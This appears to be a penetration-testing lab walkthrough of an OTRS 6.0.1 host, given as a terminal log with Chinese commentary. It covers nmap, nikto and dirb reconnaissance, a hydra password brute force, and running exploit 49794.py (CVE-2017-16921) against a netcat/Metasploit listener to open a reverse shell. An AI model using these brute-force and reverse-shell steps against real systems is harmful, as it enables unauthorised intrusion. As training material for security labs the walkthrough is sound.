┌──(kali㉿kali)-[~]
└─$ rhost='172.16.x.x'
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- $rhost
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p22,80,3306 -sC -sV -O $rhost
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-03 01:18 EDT
Nmap scan report for 172.16.x.x
Host is up (0.56s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey:
| 2048 05:9f:fe:b9:0b:0b:34:8a:09:b8:d7:62:61:ec:78:86 (RSA)
| 256 cd:2e:9a:2e:3c:f8:9d:e2:4f:0c:4d:db:d5:67:c5:27 (ECDSA)
|_ 256 63:8e:9d:28:91:a6:cc:8d:93:fd:69:72:fb:7b:e2:82 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry
|_*
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: Apache HTTP Server Test Page powered by CentOS
3306/tcp open mysql MariaDB (unauthorized)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4.4
Aggressive OS guesses: Linux 4.4 (85%)
No exact OS matches for host (test conditions non-ideal).
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.34 seconds
┌──(kali㉿kali)-[~]
└─$ whatweb $rhost
http://172.16.x.x [403 Forbidden] Apache[2.4.6], Bootstrap, Country[RESERVED][ZZ], Email[webmaster@example.com], HTTPServer[CentOS][Apache/2.4.6 (CentOS)], IP[172.16.x.x], PoweredBy[Apache,CentOS], Title[Apache HTTP Server Test Page powered by CentOS]
Apache[2.4.6]
┌──(kali㉿kali)-[~]
└─$ nikto -host $rhost
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 172.16.x.x
+ Target Hostname: 172.16.x.x
+ Target Port: 80
+ Start Time: 2024-10-03 01:23:03 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /otrs/index.pl: Retrieved x-powered-by header: OTRS 6.0.1 (https://www.otrs.com/).
+ /otrs/index.pl: Uncommon header 'x-otrs-login' found, with contents: /otrs/index.pl?.
+ /otrs/index.pl: Cookie OTRSBrowserHasCookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /otrs/installer.pl: Uncommon header 'content-disposition' found, with contents: filename="Installer.html".
+ 8912 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2024-10-03 02:03:15 (GMT-4) (2412 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Apache/2.4.6 (CentOS)
OTRS 6.0.1
┌──(kali㉿kali)-[~]
└─$ dirb http://$rhost
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Oct 3 01:26:51 2024
URL_BASE: http://172.16.x.x/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.x.x/ ----
+ http://172.16.x.x/cgi-bin/ (CODE:403|SIZE:210)
+ http://172.16.x.x/robots.txt (CODE:200|SIZE:85)
-----------------
END_TIME: Thu Oct 3 01:30:20 2024
DOWNLOADED: 4612 - FOUND: 2
robots.txt
┌──(kali㉿kali)-[~]
└─$ curl http://$rhost/robots.txt
User-agent: *
Allow: /
Allow: /otrs/index.pl
Disallow: *
Sitemap: /otrs/sitemap.xml
/otrs/index.pl
┌──(kali㉿kali)-[~]
└─$ curl $rhost/otrs/index.pl
<title>Login - OTRS 6</title>
curl確定OTRS 6,不過前面用nikto花了40分鐘已經找到OTRS 6.0.1就直接搜尋。
┌──(kali㉿kali)-[~]
└─$ searchsploit OTRS 6.0.1
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
OTRS 5.0.x/6.0.x - Remote Command Execution (1) | perl/webapps/43853.txt
OTRS 6.0.1 - Remote Command Execution (2) | perl/webapps/49794.py
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results
perl/webapps/49794.py
OTRS 6.0.1 - Remote Command Execution (2)
# Tested on: OTRS 5.0.2/CentOS 7.2.1511
# CVE : CVE-2017-16921
baseuri = "http://10.1.1.1/index.pl";
username = "root@localhost";
password = "root";
revShellIp = "10.1.1.2";
revShellPort = 7007;
確認 root 密碼
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-03 01:41:16
[ERROR] File for passwords not found: /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt
┌──(kali㉿kali)-[~]
└─$ sudo apt update
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ sudo apt install seclists
Installing:
seclists
再來一次
┌──(kali㉿kali)-[~]
└─$ hydra -l root@localhot -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt $rhost http-post-form "/otrs/index.pl:Action=Login&RequestedURL=Action%3DAdmin&Lang=en&TimeZoneOffset=240&User=root%40localhost&Password=^PASS^:Login failed"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-03 02:32:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000000 login tries (l:1/p:1000000), ~62500 tries per task
[DATA] attacking http-post-form://172.16.x.x:80/otrs/index.pl:Action=Login&RequestedURL=Action%3DAdmin&Lang=en&TimeZoneOffset=240&User=root%40localhost&Password=^PASS^:Login failed
[80][http-post-form] host: 172.16.x.x login: root@localhot password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-03 02:32:21
參考前面 Day 21 先通靈覺得帳號預設,密碼有改,找出帳密錯誤的訊息Login failed。assword=^PASS^:Login failed
最後我們找到
監聽
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 443
listening on [any] 443 ...
┌──(kali㉿kali)-[~]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.200.3
LHOST => 192.168.200.3
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.200.3:443
更改參數之後便可以監聽shell
┌──(kali㉿kali)-[~]
└─$ python3 49794.py
[+] Retrieving auth token...
[+] Successfully logged in:
OTRSAgentInterface : 9S1W9EzotkTaCoN1a6ADr7GPWdDNukpC
[+] Grabbing challenge token from PGP panel...
[+]
[+] Enabling PGP keys in config, and setting our malicious command
[+] Now attempting to trigger the command. If this hangs, it likely means the reverse shell started.
[+] Exploit complete, check your listener for a shell